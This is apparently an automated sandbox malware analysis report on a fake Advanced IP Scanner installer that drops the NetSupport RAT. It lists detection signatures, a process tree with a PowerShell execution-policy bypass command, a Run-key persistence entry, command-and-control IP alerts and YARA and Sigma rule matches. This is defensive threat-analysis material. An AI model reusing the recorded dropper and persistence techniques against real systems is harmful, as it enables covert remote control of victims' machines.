Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Advanced_IP_Scanner_2.5.4594.12.exe

Overview

General Information

Sample name:Advanced_IP_Scanner_2.5.4594.12.exe
Analysis ID:1546304
MD5:446c29d515104b6752c1e9da981d4e5e
SHA1:d52760df6b22805a4470a6b2e72654ce36577f30
SHA256:7b13496fb45b51e821771d63bbd1d503f07710f676481ff34962b051283d8033
Tags:exeuser-NDA0E
Infos:

Detection

NetSupport RAT, NetSupport Downloader
Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:33
Range:0 - 100

Signatures

Malicious sample detected (through community Yara rule)
Sigma detected: Powershell drops NetSupport RAT client
Suricata IDS alerts for network traffic
Yara detected Advanced IP Scanner Hacktool
Yara detected NetSupport Downloader
Bypasses PowerShell execution policy
Contains functionality to detect sleep reduction / modifications
Contains functionalty to change the wallpaper
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool
Yara signature match

Classification

  • System is w10x64
  • Advanced_IP_Scanner_2.5.4594.12.exe (PID: 6984 cmdline: "C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe" MD5: 446C29D515104B6752C1E9DA981D4E5E)
    • Advanced_IP_Scanner_2.5.4594.12.tmp (PID: 7032 cmdline: "C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp" /SL5="$402A0,18032967,815616,C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe" MD5: 597637EDBEBB79D482E762E238209BCD)
      • powershell.exe (PID: 7132 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 6356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • client32.exe (PID: 5304 cmdline: "C:\Users\user\AppData\Roaming\SysHelper\client32.exe" MD5: 4F2D0F4A5BA798FA9E85379C7C4BD36E)
  • client32.exe (PID: 2228 cmdline: "C:\Users\user\AppData\Roaming\SysHelper\client32.exe" MD5: 4F2D0F4A5BA798FA9E85379C7C4BD36E)
  • client32.exe (PID: 1832 cmdline: "C:\Users\user\AppData\Roaming\SysHelper\client32.exe" MD5: 4F2D0F4A5BA798FA9E85379C7C4BD36E)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\SysHelper\AudioCapture.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\Users\user\AppData\Roaming\SysHelper\client32.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\Users\user\AppData\Roaming\SysHelper\TCCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1JoeSecurity_NetSupportDownloaderYara detected NetSupport DownloaderJoe Security
          C:\Users\user\AppData\Roaming\SysHelper\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 6 entries
            SourceRuleDescriptionAuthorStrings
            00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                00000007.00000000.2061459893.0000000000404000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  00000008.00000002.2161014488.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    0000000A.00000002.2249175114.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                      Click to see the 23 entries
                      SourceRuleDescriptionAuthorStrings
                      7.2.client32.exe.688b0000.6.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        8.2.client32.exe.688b0000.5.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          8.0.client32.exe.400000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                            8.2.client32.exe.400000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                              7.2.client32.exe.400000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                                Click to see the 20 entries
                                SourceRuleDescriptionAuthorStrings
                                amsi32_7132.amsi.csvJoeSecurity_NetSupportDownloaderYara detected NetSupport DownloaderJoe Security
                                  amsi32_7132.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                                  • 0x2e4f78:$b1: ::WriteAllBytes(
                                  • 0x2e4f42:$b2: ::FromBase64String(
                                  • 0x2f16a4:$s1: -join
                                  • 0x2eae50:$s4: +=
                                  • 0x2eaf12:$s4: +=
                                  • 0x2ef139:$s4: +=
                                  • 0x2f1256:$s4: +=
                                  • 0x2f1540:$s4: +=
                                  • 0x2f1686:$s4: +=
                                  • 0x2f4e9c:$s4: +=
                                  • 0x2f4fa0:$s4: +=
                                  • 0x2f83fc:$s4: +=
                                  • 0x2f8adc:$s4: +=
                                  • 0x2f8f92:$s4: +=
                                  • 0x2f8fe7:$s4: +=
                                  • 0x2f925b:$s4: +=
                                  • 0x2f928a:$s4: +=
                                  • 0x2f97d2:$s4: +=
                                  • 0x2f9801:$s4: +=
                                  • 0x2f98e0:$s4: +=
                                  • 0x2fbb77:$s4: +=

                                  System Summary

                                  barindex
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp" /SL5="$402A0,18032967,815616,C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp, ParentProcessId: 7032, ParentProcessName: Advanced_IP_Scanner_2.5.4594.12.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1", ProcessId: 7132, ProcessName: powershell.exe
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp" /SL5="$402A0,18032967,815616,C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp, ParentProcessId: 7032, ParentProcessName: Advanced_IP_Scanner_2.5.4594.12.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1", ProcessId: 7132, ProcessName: powershell.exe
                                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp" /SL5="$402A0,18032967,815616,C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp, ParentProcessId: 7032, ParentProcessName: Advanced_IP_Scanner_2.5.4594.12.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1", ProcessId: 7132, ProcessName: powershell.exe
                                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\SysHelper\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7132, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MyApp
                                  Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7132, TargetFilename: C:\Users\user\AppData\Roaming\SysHelper\pcicapi.dll
                                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp" /SL5="$402A0,18032967,815616,C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp, ParentProcessId: 7032, ParentProcessName: Advanced_IP_Scanner_2.5.4594.12.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1", ProcessId: 7132, ProcessName: powershell.exe

                                  Remote Access Functionality

                                  barindex
                                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7132, TargetFilename: C:\Users\user\AppData\Roaming\SysHelper\NSM.LIC
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-10-31T19:00:58.789554+010020229301A Network Trojan was detected4.245.163.56443192.168.2.449733TCP
                                  2024-10-31T19:01:37.187096+010020229301A Network Trojan was detected20.12.23.50443192.168.2.449758TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-10-31T19:00:43.628569+010028277451Malware Command and Control Activity Detected192.168.2.449739151.236.16.15443TCP
                                  2024-10-31T19:00:43.628569+010028277451Malware Command and Control Activity Detected192.168.2.449740199.188.200.195443TCP

                                  Click to jump to signature section

                                  Show All Signature Results
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_110AC820 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,7_2_110AC820
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_110AC820 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,8_2_110AC820
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeEXE: C:\Users\user\AppData\Roaming\SysHelper\remcmdstub.exeJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeEXE: C:\Users\user\AppData\Roaming\SysHelper\client32.exeJump to behavior

                                  Compliance

                                  barindex
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeEXE: C:\Users\user\AppData\Roaming\SysHelper\remcmdstub.exeJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeEXE: C:\Users\user\AppData\Roaming\SysHelper\client32.exeJump to behavior
                                  Source: Advanced_IP_Scanner_2.5.4594.12.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: Advanced_IP_Scanner_2.5.4594.12.exeStatic PE information: certificate valid
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\SysHelper\msvcr100.dllJump to behavior
                                  Source: Advanced_IP_Scanner_2.5.4594.12.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: client32.exe, 00000007.00000002.3641013558.00000000688B2000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000008.00000002.2161613841.00000000688B2000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 0000000A.00000002.2250587498.00000000688B2000.00000002.00000001.01000000.0000000C.sdmp
                                  Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: is-50T4N.tmp.1.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2160969972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249132975.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
                                  Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: is-3DFK3.tmp.1.dr
                                  Source: Binary string: o:\Builder\BuildRoot\Free\Radmin_3_0_Install_Dll\Viewer\Release\Viewer.pdb source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp
                                  Source: Binary string: client32.pdb\1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: is-7T7KO.tmp.1.dr
                                  Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: is-G1AVJ.tmp.1.dr
                                  Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb- source: powershell.exe, 00000005.00000002.2183755399.0000000009739000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: is-37BEP.tmp.1.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdbP` source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr
                                  Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: is-8NFDN.tmp.1.dr
                                  Source: Binary string: \1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: is-UUUMK.tmp.1.dr
                                  Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: is-JD615.tmp.1.dr
                                  Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: is-B6942.tmp.1.dr
                                  Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: is-GO656.tmp.1.dr
                                  Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000007.00000002.3640696610.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, client32.exe, 00000008.00000002.2161392777.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, client32.exe, 0000000A.00000002.2249977529.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp
                                  Source: Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\platforms\qwindows.pdb source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, is-R93D4.tmp.1.dr
                                  Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: is-MLS3P.tmp.1.dr
                                  Source: Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\platforms\qwindows.pdbss' source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, is-R93D4.tmp.1.dr
                                  Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2132549771.0000000002D9D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdb source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr
                                  Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: is-3ARML.tmp.1.dr
                                  Source: Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\printsupport\windowsprintersupport.pdb"" source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2253546565.0000000000D9C000.00000004.00000010.00020000.00000000.sdmp
                                  Source: Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\printsupport\windowsprintersupport.pdb source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2253546565.0000000000D9C000.00000004.00000010.00020000.00000000.sdmp
                                  Source: Binary string: client32.pdb source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: is-NMSBJ.tmp.1.dr
                                  Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: is-51B0J.tmp.1.dr
                                  Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: is-JV2VP.tmp.1.dr
                                  Source: Binary string: o:\Builder\BuildRoot\Free\Radmin_3_0_Install_Dll\Viewer\Release\Viewer.pdbt3 source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000007.00000002.3640885931.0000000068895000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 00000008.00000002.2161541920.0000000068895000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 0000000A.00000002.2250457017.0000000068895000.00000002.00000001.01000000.0000000D.sdmp

                                  Spreading

                                  barindex
                                  Source: Yara matchFile source: C:\Program Files (x86)\Advanced IP Scanner\is-FDUCH.tmp, type: DROPPED
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_11123570 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,7_2_11123570
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_11069690 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,7_2_11069690
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_1110BB80 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,_memset,WriteFile,7_2_1110BB80
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_11107FE0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,7_2_11107FE0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,7_2_110BC3D0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,7_2_1102CE2D
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_11064E30 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,7_2_11064E30
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,8_2_1102CE2D
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_11123570 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,8_2_11123570
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_11069690 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,8_2_11069690
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_1110BB80 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,_memset,WriteFile,8_2_1110BB80
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_11107FE0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,8_2_11107FE0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,8_2_110BC3D0
